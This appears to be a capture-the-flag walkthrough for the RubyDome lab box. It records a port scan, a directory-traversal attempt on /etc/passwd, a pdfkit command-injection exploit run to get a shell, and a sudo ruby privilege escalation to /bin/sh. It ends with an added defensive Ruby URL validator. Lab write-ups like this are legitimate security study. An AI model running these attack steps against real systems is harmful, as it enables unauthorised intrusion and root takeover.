WDavid404 / PG-Box

PG box walkthrough note

RubyDome (easy, linux, 2023) -- PDFKit #22

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago

Key points:

WDavid404 commented 4 months ago
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
3000/tcp open  http    syn-ack ttl 61 WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
|_http-title: RubyDome HTML to PDF

WEBrick httpd 1.7.0 --> https://www.exploit-db.com/exploits/5215 (Ruby 1.8.6/1.9 (WEBick HTTPd 1.3.1) - Directory Traversal) --> version info doesn't match. Try it (http://192.168.218.22:3000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd) --> doesn't work...

On the 3000/tcp web page, input http://127.0.0.1 --> (screenshot)

Search PDFKit exploit --> https://www.exploit-db.com/exploits/51293 (pdfkit v0.8.7.2 - Command Injection)

We don't know the PDFKit version, but try it: python3 51293.py -s 192.168.45.180 80 -w http://192.168.218.22:3000/pdf -p url (From Burp Suite, we know the URL is /pdf, not /pdf/, and "-p (parameter)" should be "url".) (screenshot)

--> works! (screenshots)

PE:

sudo -l --> (screenshot)

According to https://gtfobins.github.io/gtfobins/ruby/#sudo

echo 'exec "/bin/sh"'>/home/andrew/app/app.rb
sudo /usr/bin/ruby /home/andrew/app/app.rb

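The two things the write-up shows the RubyDome service doing, rendering http://127.0.0.1 on request and passing the URL through to the PDF renderer unsafely, are where a defender would put a gate. The following is an added Ruby example, not code from the box or from PDFKit: `validate_render_url`, `render_argv`, the character allow-list and the internal-network list are my own assumptions, not PDFKit's API.

```ruby
# Added example, not code from the RubyDome box or from PDFKit: a strict gate for a
# user-supplied URL before an HTML-to-PDF service renders it. It refuses shell
# metacharacters (raw or percent-encoded) and internal addresses, and builds the
# renderer command as an argv array so no shell ever parses the URL.
require 'uri'
require 'ipaddr'
class UnsafeUrl < StandardError; end

# Allow-list of characters a fetchable URL needs; backticks, quotes, whitespace,
# $, ;, |, brackets and parens are deliberately absent (so no IPv6 literals).
URL_CHARS = /\A[A-Za-z0-9\-._~:\/?#@+,=%&]+\z/
# Must not appear once %XX is decoded: catches "%20%60id%60" as well as "`id`".
DECODED_META = /[\s`$'"\\|<>(){}]/
INTERNAL_NETS = %w[127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 169.254.0.0/16
                   0.0.0.0/8 ::1/128 fc00::/7 fe80::/10].map { |n| IPAddr.new(n) }

# Decode only ASCII %XX sequences; multi-byte sequences stay encoded.
def percent_decode(s)
  s.gsub(/%([0-9A-Fa-f]{2})/) { |m| c = m[1, 2].hex; c < 0x80 ? c.chr : m }
end

# Returns the normalised URL or raises UnsafeUrl.
def validate_render_url(raw)
  raise UnsafeUrl, 'too long' if raw.length > 2048
  raise UnsafeUrl, 'character outside allow-list' unless raw.match?(URL_CHARS)
  raise UnsafeUrl, 'encoded shell metacharacter' if percent_decode(raw).match?(DECODED_META)
  uri = begin
    URI.parse(raw)
  rescue URI::Error
    raise UnsafeUrl, 'unparseable URL'
  end
  raise UnsafeUrl, 'scheme must be http or https' unless %w[http https].include?(uri.scheme)
  raise UnsafeUrl, 'missing host' if uri.host.nil? || uri.host.empty?
  raise UnsafeUrl, 'credentials in URL' if uri.userinfo
  raise UnsafeUrl, 'localhost not allowed' if uri.host.casecmp?('localhost')
  begin
    ip = IPAddr.new(uri.host) # IP literal: must not be loopback/private/link-local
    raise UnsafeUrl, 'internal address' if INTERNAL_NETS.any? { |n| n.family == ip.family && n.include?(ip) }
  rescue IPAddr::InvalidAddressError
    # hostname rather than an IP literal; DNS resolution/rebinding checks are out of scope here
  end
  uri.to_s
end

# Argv for IO.popen/Process.spawn (array form): the URL is one argument, never shell-parsed.
def render_argv(raw)
  ['wkhtmltopdf', '--quiet', validate_render_url(raw), '-']
end
```

The hostname branch deliberately stops short of DNS: a production service would also resolve the host and apply the same INTERNAL_NETS check to every returned address.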